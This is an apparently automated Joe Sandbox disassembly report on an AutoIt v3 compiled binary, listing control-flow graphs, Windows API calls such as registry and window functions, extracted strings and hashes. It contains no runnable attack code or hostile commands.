                                                • Opcode Fuzzy Hash: 7b7d8f9d5f658d3e74c70d13057465e5706560f1aeae46c601377e9269cd3dee
                                                • Instruction Fuzzy Hash: A9D0C9B4C1111DEACB91CB90DC88DDD737CBB04304F1001A5F50AE2000DB34A5488B10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 3fcd16-3fcd5a call 37bf07 * 3 7 3fcd5c-3fcd5f 0->7 8 3fcd65-3fcdd8 call 378e70 call 3fd6b1 call 3fd2f7 0->8 7->8 9 3fce64-3fce71 call 37e650 7->9 21 3fcdda-3fcde8 8->21 22 3fce08-3fce0d 8->22 16 3fd1ef-3fd212 call 37bd2c * 3 9->16 27 3fcded-3fcdfd 21->27 28 3fcdea 21->28 25 3fce0f-3fce24 RegConnectRegistryW 22->25 26 3fce7c 22->26 30 3fce76-3fce7a 25->30 31 3fce26-3fce43 call 377ab0 25->31 34 3fce80-3fceab RegCreateKeyExW 26->34 32 3fcdff 27->32 33 3fce02-3fce06 27->33 28->27 30->34 45 3fce48-3fce58 31->45 46 3fce45 31->46 32->33 35 3fce61-3fce63 33->35 36 3fcf0e-3fcf13 34->36 37 3fcead-3fceca call 377ab0 34->37 35->9 42 3fcf19-3fcf42 call 378e70 call 394db8 36->42 43 3fd1d6-3fd1e7 RegCloseKey 36->43 49 3fcecf-3fcede 37->49 50 3fcecc 37->50 59 3fcf96-3fcfb9 call 378e70 call 394db8 42->59 60 3fcf44-3fcf91 call 378e70 call 394cf3 call 378e70 * 2 42->60 43->16 47 3fd1e9-3fd1ed RegCloseKey 43->47 51 3fce5d 45->51 52 3fce5a 45->52 46->45 47->16 54 3fcee3-3fcef9 call 37e650 49->54 55 3fcee0 49->55 50->49 51->35 52->51 54->16 63 3fceff-3fcf09 RegCloseKey 54->63 55->54 72 3fcfbf-3fd019 call 378e70 call 394cf3 call 378e70 * 2 RegSetValueExW 59->72 73 3fd047-3fd06a call 378e70 call 394db8 59->73 85 3fd2bb-3fd2c7 RegSetValueExW 60->85 63->16 72->43 103 3fd01f-3fd042 call 377ab0 call 37e650 72->103 86 3fd156-3fd179 call 378e70 call 394db8 73->86 87 3fd070-3fd0d6 call 378e70 call 39019b call 378e70 call 37605e 73->87 85->43 89 3fd2cd-3fd2f2 call 377ab0 call 37e650 85->89 108 3fd17f-3fd19f call 37c92d call 378e70 86->108 109 3fd215-3fd238 call 378e70 call 394db8 86->109 124 3fd0d8-3fd0dd 87->124 125 3fd0f6-3fd128 call 378e70 RegSetValueExW 87->125 89->43 103->43 127 3fd1a1-3fd1b4 RegSetValueExW 108->127 128 3fd23a-3fd260 call 37c5df call 378e70 109->128 129 3fd265-3fd282 call 378e70 call 394db8 109->129 130 3fd0df-3fd0e1 124->130 131 3fd0e5-3fd0e8 124->131 137 3fd14a-3fd151 call 3901a4 125->137 138 3fd12a-3fd143 call 377ab0 call 37e650 125->138 127->43 133 3fd1b6-3fd1c0 call 377ab0 127->133 128->127 145 3fd1c5-3fd1cf call 37e650 129->145 153 3fd288-3fd2b9 call 3e276a call 378e70 call 3e27da 129->153 130->131 131->124 135 3fd0ea-3fd0ec 131->135 133->145 135->125 141 3fd0ee-3fd0f2 135->141 137->43 138->137 141->125 145->43 153->85
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003FCE1C
                                                • RegCreateKeyExW.KERNELBASE(?,?,00000000,0040DCD0,00000000,?,00000000,?,?), ref: 003FCEA3
                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 003FCF03
                                                • _wcslen.LIBCMT ref: 003FCF53
                                                • _wcslen.LIBCMT ref: 003FCFCE
                                                • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 003FD011
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 003FD120
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 003FD1AC
                                                • RegCloseKey.KERNELBASE(?), ref: 003FD1E0
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FD1ED
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 003FD2BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 9721498-966354055
                                                • Opcode ID: 65b089507ed1d89caf8417fe36ddd1c31b3dee7caf4aae018e46192612d970aa
                                                • Instruction ID: 913a5f23bdabf46887400b9967da073f650714e956a402e8cc0e64d82963e2bb
                                                • Opcode Fuzzy Hash: 65b089507ed1d89caf8417fe36ddd1c31b3dee7caf4aae018e46192612d970aa
                                                • Instruction Fuzzy Hash: 371267352042059FDB26DF14C885A2AB7E6FF88714F15849CF99A9F3A2CB35ED41CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 163 373e15-373e45 call 39019b call 39016b 168 373e47-373e49 163->168 169 373e6e-373e80 call 39919b 163->169 171 373e4a-373e50 168->171 169->171 175 373e82-373e94 call 39919b 169->175 173 373e65-373e6b 171->173 174 373e52-373e62 call 39015d call 3901a4 171->174 174->173 182 373e9a-373eac call 39919b 175->182 183 3b4585-3b4587 175->183 186 373eb2-373ec4 call 39919b 182->186 187 3b458c-3b458f 182->187 183->171 190 373eca-373edc call 39919b 186->190 191 3b4594-3b45cb call 374154 call 374093 call 373fb8 call 394cf3 186->191 187->171 196 3b462e-3b4633 190->196 197 373ee2-373ef4 call 39919b 190->197 223 3b4608-3b460b 191->223 224 3b45cd-3b45d8 191->224 196->171 201 3b4639-3b4655 call 38e2e5 196->201 205 3b4677-3b4688 call 3da316 197->205 206 373efa-373f0c call 39919b 197->206 212 3b4662-3b466a 201->212 213 3b4657-3b465b 201->213 219 3b468a-3b46d2 call 37b25f * 2 call 375379 call 373aa3 call 37bd2c * 2 205->219 220 3b46dc-3b46e2 205->220 221 373f26 206->221 222 373f0e-373f20 call 39919b 206->222 212->171 215 3b4670 212->215 213->201 214 3b465d 213->214 214->171 215->205 240 3b4704-3b4706 219->240 268 3b46d4-3b46d7 219->268 225 3b46f5-3b46ff call 3da12a 220->225 230 373f29-373f2e call 37ad74 221->230 222->171 222->221 226 3b460d-3b461b 223->226 227 3b45f6-3b4603 call 3901a4 223->227 224->223 231 3b45da-3b45e1 224->231 225->240 239 3b4620-3b4629 call 3901a4 226->239 227->225 242 373f33-373f35 230->242 231->227 237 3b45e3-3b45e7 231->237 237->227 243 3b45e9-3b45f4 237->243 239->171 240->171 246 373f3b-373f5e call 373fb8 call 374093 call 39919b 242->246 247 3b46e4-3b46e9 242->247 243->239 264 373fb0-373fb3 246->264 265 373f60-373f72 call 39919b 246->265 247->171 249 3b46ef-3b46f0 247->249 249->225 264->230 265->264 270 373f74-373f86 call 39919b 265->270 268->171 273 373f9c-373fa5 270->273 274 373f88-373f9a call 39919b 270->274 273->171 276 373fab 273->276 274->230 274->273 276->230
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 0-1645009161
                                                • Opcode ID: b7482771c8a80de77edcb9119d1832f22169419f6ab14589f763bf1e32709c71
                                                • Instruction ID: 05226bdc90e6f256d4bc32a744a04a920cabeefd400443f7e9d670c45e999613
                                                • Opcode Fuzzy Hash: b7482771c8a80de77edcb9119d1832f22169419f6ab14589f763bf1e32709c71
                                                • Instruction Fuzzy Hash: A9812771A40205BBDF33AF64DC42FEE7B68AF05700F148026F909AE582EB78DA45D759

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 440 373696-3736ab 441 3736ad-3736b0 440->441 442 37370b-37370d 440->442 444 3736b2-3736b9 441->444 445 373711 441->445 442->441 443 37370f 442->443 446 3736f6-3736fe DefWindowProcW 443->446 449 3736bf-3736c4 444->449 450 37378b-373793 PostQuitMessage 444->450 447 373717-37371c 445->447 448 3b3dce-3b3df6 call 372f24 call 38f1c6 445->448 452 373704-37370a 446->452 454 373743-37376a SetTimer RegisterWindowMessageW 447->454 455 37371e-373721 447->455 483 3b3dfb-3b3e02 448->483 456 3b3e3b-3b3e4f call 3dc80c 449->456 457 3736ca-3736ce 449->457 453 37373f-373741 450->453 453->452 454->453 462 37376c-373777 CreatePopupMenu 454->462 460 373727-37373a KillTimer call 37388e call 37572c 455->460 461 3b3d6f-3b3d72 455->461 456->453 475 3b3e55 456->475 463 373795-37379f call 38fcbb 457->463 464 3736d4-3736d9 457->464 460->453 470 3b3daa-3b3dc9 MoveWindow 461->470 471 3b3d74-3b3d78 461->471 462->453 477 3737a4 463->477 465 3736df-3736e4 464->465 466 3b3e20-3b3e27 464->466 473 3736ea-3736f0 465->473 474 373779-373789 call 3737a6 465->474 466->446 481 3b3e2d-3b3e36 call 3d1367 466->481 470->453 478 3b3d7a-3b3d7d 471->478 479 3b3d99-3b3da5 SetFocus 471->479 473->446 473->483 474->453 475->446 477->453 478->473 484 3b3d83-3b3d94 call 372f24 478->484 479->453 481->446 483->446 488 3b3e08-3b3e1b call 37388e call 3738f2 483->488 484->453 488->446
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00373690,?,?), ref: 003736FE
                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,00373690,?,?), ref: 0037372A
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0037374D
                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00373690,?,?), ref: 00373758
                                                • CreatePopupMenu.USER32 ref: 0037376C
                                                • PostQuitMessage.USER32(00000000), ref: 0037378D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: 0$D$0$D$TaskbarCreated
                                                • API String ID: 129472671-859958045
                                                • Opcode ID: 5fa9b2142f971edfb3b96baa76e0b8b11cc47fd90f5926df3d8097efc96c7608
                                                • Instruction ID: 81a71e3f28f0d40ecd6615664bbcfc02a87ee59e14138c50e4bf6ab99de7a088
                                                • Opcode Fuzzy Hash: 5fa9b2142f971edfb3b96baa76e0b8b11cc47fd90f5926df3d8097efc96c7608
                                                • Instruction Fuzzy Hash: 1F414DF5204185B7DB3B1F78CD4ABB93A69E705310F40C139F5098A690CBBD9B00B71A

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 003735DE
                                                • RegisterClassExW.USER32(00000030), ref: 00373608
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00373619
                                                • InitCommonControlsEx.COMCTL32(?), ref: 00373636
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00373646
                                                • LoadIconW.USER32(000000A9), ref: 0037365C
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0037366B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: b48e16fdc0fd591c14f9314a15ac2ed595d5b1dd343d32db6d0bb365f4931e80
                                                • Instruction ID: 7e67eda22af24f70a248c099ca04ede5ff5ae4f2343740a5127d76ba9e05ce19
                                                • Opcode Fuzzy Hash: b48e16fdc0fd591c14f9314a15ac2ed595d5b1dd343d32db6d0bb365f4931e80
                                                • Instruction Fuzzy Hash: 5B21E5B5E01219AFDB00DFE4EE49B9DBBB4FB09704F00412AF515B62A0D7B44545CF99

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 497 3b09fb-3b0a2b call 3b07cf 500 3b0a2d-3b0a38 call 39f656 497->500 501 3b0a46-3b0a52 call 3a55b1 497->501 506 3b0a3a-3b0a41 call 39f669 500->506 507 3b0a6b-3b0ab4 call 3b073a 501->507 508 3b0a54-3b0a69 call 39f656 call 39f669 501->508 518 3b0d1d-3b0d23 506->518 516 3b0b21-3b0b2a GetFileType 507->516 517 3b0ab6-3b0abf 507->517 508->506 522 3b0b2c-3b0b5d GetLastError call 39f633 CloseHandle 516->522 523 3b0b73-3b0b76 516->523 520 3b0ac1-3b0ac5 517->520 521 3b0af6-3b0b1c GetLastError call 39f633 517->521 520->521 527 3b0ac7-3b0af4 call 3b073a 520->527 521->506 522->506 534 3b0b63-3b0b6e call 39f669 522->534 525 3b0b78-3b0b7d 523->525 526 3b0b7f-3b0b85 523->526 530 3b0b89-3b0bd7 call 3a54fa 525->530 526->530 531 3b0b87 526->531 527->516 527->521 540 3b0bd9-3b0be5 call 3b094b 530->540 541 3b0be7-3b0c0b call 3b04ed 530->541 531->530 534->506 540->541 548 3b0c0f-3b0c19 call 3a8a3e 540->548 546 3b0c1e-3b0c61 541->546 547 3b0c0d 541->547 550 3b0c63-3b0c67 546->550 551 3b0c82-3b0c90 546->551 547->548 548->518 550->551 553 3b0c69-3b0c7d 550->553 554 3b0d1b 551->554 555 3b0c96-3b0c9a 551->555 553->551 554->518 555->554 556 3b0c9c-3b0ccf CloseHandle call 3b073a 555->556 559 3b0d03-3b0d17 556->559 560 3b0cd1-3b0cfd GetLastError call 39f633 call 3a56c3 556->560 559->554 560->559
                                                APIs
                                                  • Part of subcall function 003B073A: CreateFileW.KERNELBASE(00000000,00000000,?,003B0AA4,?,?,00000000,?,003B0AA4,00000000,0000000C), ref: 003B0757
                                                • GetLastError.KERNEL32 ref: 003B0B0F
                                                • __dosmaperr.LIBCMT ref: 003B0B16
                                                • GetFileType.KERNELBASE(00000000), ref: 003B0B22
                                                • GetLastError.KERNEL32 ref: 003B0B2C
                                                • __dosmaperr.LIBCMT ref: 003B0B35
                                                • CloseHandle.KERNEL32(00000000), ref: 003B0B55
                                                • CloseHandle.KERNEL32(?), ref: 003B0C9F
                                                • GetLastError.KERNEL32 ref: 003B0CD1
                                                • __dosmaperr.LIBCMT ref: 003B0CD8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: becaa2a964e86e887994a28efc1d00946080e2508318febcdd1d1f809e421a0c
                                                • Instruction ID: d91149d28f0dc20ac05ab4fb3a241ed726f2a3dec6ac7e2061439999a47f4559
                                                • Opcode Fuzzy Hash: becaa2a964e86e887994a28efc1d00946080e2508318febcdd1d1f809e421a0c
                                                • Instruction Fuzzy Hash: 68A1E632A042148FDF1EEF78D892BAE7BA0AB06328F14015DF911DF2E1DB319956CB55

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0037551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00375539
                                                  • Part of subcall function 003751BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003751E1
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0037534B
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003B4BD7
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003B4C18
                                                • RegCloseKey.ADVAPI32(?), ref: 003B4C5A
                                                • _wcslen.LIBCMT ref: 003B4CC1
                                                • _wcslen.LIBCMT ref: 003B4CD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 98802146-2727554177
                                                • Opcode ID: e350312eaddc1360d4ec944f084a684657d2d6070e41745032eec956ef7e9a0b
                                                • Instruction ID: 866776efcf8bb1adc99a45c7146c65da2389e687789367653f8918f93ab329a9
                                                • Opcode Fuzzy Hash: e350312eaddc1360d4ec944f084a684657d2d6070e41745032eec956ef7e9a0b
                                                • Instruction Fuzzy Hash: 9771BE75504300AED715EF64DC829ABBBF8FF89B40F40442EF948CB1A1EB709A08CB59

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00373465
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00373474
                                                • LoadIconW.USER32(00000063), ref: 0037348A
                                                • LoadIconW.USER32(000000A4), ref: 0037349C
                                                • LoadIconW.USER32(000000A2), ref: 003734AE
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003734C6
                                                • RegisterClassExW.USER32(?), ref: 00373517
                                                  • Part of subcall function 003735AB: GetSysColorBrush.USER32(0000000F), ref: 003735DE
                                                  • Part of subcall function 003735AB: RegisterClassExW.USER32(00000030), ref: 00373608
                                                  • Part of subcall function 003735AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00373619
                                                  • Part of subcall function 003735AB: InitCommonControlsEx.COMCTL32(?), ref: 00373636
                                                  • Part of subcall function 003735AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00373646
                                                  • Part of subcall function 003735AB: LoadIconW.USER32(000000A9), ref: 0037365C
                                                  • Part of subcall function 003735AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0037366B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 07477a95b8ded188edc970c903b2ebca7b27d5eb1fecb328ad6d580452cf9f6f
                                                • Instruction ID: d15bc4156dc9c232db5d1cae76a2f85605a0b2e41a248b960477a54c1b9d9a13
                                                • Opcode Fuzzy Hash: 07477a95b8ded188edc970c903b2ebca7b27d5eb1fecb328ad6d580452cf9f6f
                                                • Instruction Fuzzy Hash: E3213D78D00314ABDB109FA5EE45AA97FB4FB09B50F40403AF904B72A0C3F945858F98
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0037CE8E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: p3D$p3D$p3D$p3D$p5D$p5D$x3D$x3D
                                                • API String ID: 1385522511-1780764073
                                                • Opcode ID: f770730ec5207a34181b14c5b912830d02a1c9841e77048e4ca005e1cb6bc214
                                                • Instruction ID: 2abc1e725a26e6a38ecafb7ea714745e83a5386805ad8239845b08c4eddb4652
                                                • Opcode Fuzzy Hash: f770730ec5207a34181b14c5b912830d02a1c9841e77048e4ca005e1cb6bc214
                                                • Instruction Fuzzy Hash: CC32BF75A002059FDB26CF54C885FBAB7B9EF45300F26C06DE80AAB252C778ED41DB90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 845 373aa3-373ac6 846 3b4139-3b414c call 3da12a 845->846 847 373acc-373b35 call 39019b call 377953 call 37bf07 call 377953 * 2 call 376e52 845->847 853 3b4153-3b415b 846->853 880 3b456b-3b457b call 3da12a 847->880 881 373b3b-373b48 call 376cce call 376b12 847->881 855 3b416b-3b4173 853->855 856 3b415d-3b4165 853->856 859 3b417e-3b4186 855->859 860 3b4175-3b417c 855->860 856->855 858 373b64-373bd3 call 37bf07 call 373a70 call 37bf07 call 37557e call 3741c9 call 376bfa 856->858 895 373bd9-373c48 call 37bf07 * 2 call 37694e call 377af4 SetCurrentDirectoryW call 37bd2c * 2 call 39019b call 3741a6 858->895 896 3b41b4-3b41bf 858->896 864 3b4188-3b418f 859->864 865 3b4191-3b4199 859->865 863 3b41a6-3b41af call 3dd4bf 860->863 863->858 864->863 865->858 869 3b419f-3b41a1 865->869 869->863 888 3b4580 880->888 892 373b4d-373b5e call 376afb 881->892 888->888 892->853 892->858 942 373c4c-373c51 895->942 896->895 898 3b41c5-3b41f8 call 377953 call 37636d 896->898 908 3b41fe-3b4225 call 3e35cd call 3763db 898->908 909 3b4502-3b4519 call 3da12a 898->909 908->909 925 3b422b-3b42a7 call 39016b call 37bc23 call 37bb3d 908->925 917 373da5-373df0 call 37bd2c * 2 call 377953 call 37bd2c call 377953 call 3901a4 909->917 944 3b446f-3b44ab call 37bc23 call 3e13a0 call 3d4a0c call 394d0e 925->944 945 3b42ad-3b42cf call 37bc23 925->945 946 373c57-373c64 call 37ad74 942->946 947 373d71-373d92 call 377953 SetCurrentDirectoryW 942->947 994 3b44ad-3b44d2 call 375c10 call 3901a4 call 3e1388 944->994 960 3b42d1-3b42e0 945->960 961 3b42e5-3b42f0 call 3e14a6 945->961 946->947 962 373c6a-373c86 call 374093 call 373ff3 946->962 947->917 963 373d94-373da2 call 39015d call 3901a4 947->963 966 3b4401-3b4414 call 37bb3d 960->966 977 3b430d-3b4318 call 3e1492 961->977 978 3b42f2-3b4308 961->978 990 3b454e-3b4566 call 3da12a 962->990 991 373c8c-373ca3 call 373fb8 call 394cf3 962->991 963->917 966->945 983 3b441a-3b4424 966->983 997 3b431a-3b4329 977->997 998 3b432e-3b4339 call 38e607 977->998 978->966 987 3b4457 call 3da486 983->987 988 3b4426-3b4434 983->988 1004 3b445c-3b4469 987->1004 988->987 995 3b4436-3b4455 call 3740e0 988->995 990->947 1013 373cc6-373cc9 991->1013 1014 373ca5-373cc0 call 396755 991->1014 994->917 995->1004 997->966 998->966 1009 3b433f-3b435b call 3d9f0d 998->1009 1004->944 1004->945 1021 3b438a-3b438d 1009->1021 1022 3b435d-3b4388 call 37b25f call 37bd2c 1009->1022 1018 373df3-373df9 1013->1018 1019 373ccf-373cd4 1013->1019 1014->1013 1014->1018 1018->1019 1027 373dff-3b452a 1018->1027 1024 3b452f-3b4537 call 3d9dd5 1019->1024 1025 373cda-373d13 call 37b25f call 373e15 1019->1025 1032 3b43c9-3b43cc 1021->1032 1033 3b438f-3b43b5 call 37b25f call 377d27 call 37bd2c 1021->1033 1072 3b43b6-3b43c7 call 37bc23 1022->1072 1048 3b453c-3b453f 1024->1048 1057 373d15-373d2c call 3901a4 call 39015d 1025->1057 1058 373d30-373d32 1025->1058 1027->1019 1035 3b43ce-3b43d7 call 3d9e3c 1032->1035 1036 3b43ed-3b43f1 call 3e142e 1032->1036 1033->1072 1053 3b43dd-3b43e8 call 3901a4 1035->1053 1054 3b44d7-3b4500 call 3da12a call 3901a4 call 394d0e 1035->1054 1044 3b43f6-3b4400 call 3901a4 1036->1044 1044->966 1055 3b4545-3b4549 1048->1055 1056 373e08-373e10 1048->1056 1053->945 1054->994 1055->1056 1061 373d5e-373d6b 1056->1061 1057->1058 1062 373e04 1058->1062 1063 373d38-373d3b 1058->1063 1061->942 1061->947 1062->1056 1063->1056 1071 373d41-373d44 1063->1071 1071->1048 1077 373d4a-373d59 call 3740e0 1071->1077 1072->1044 1077->1061
                                                APIs
                                                  • Part of subcall function 00377953: CloseHandle.KERNELBASE(?,?,00000000,003B3A1C), ref: 00377973
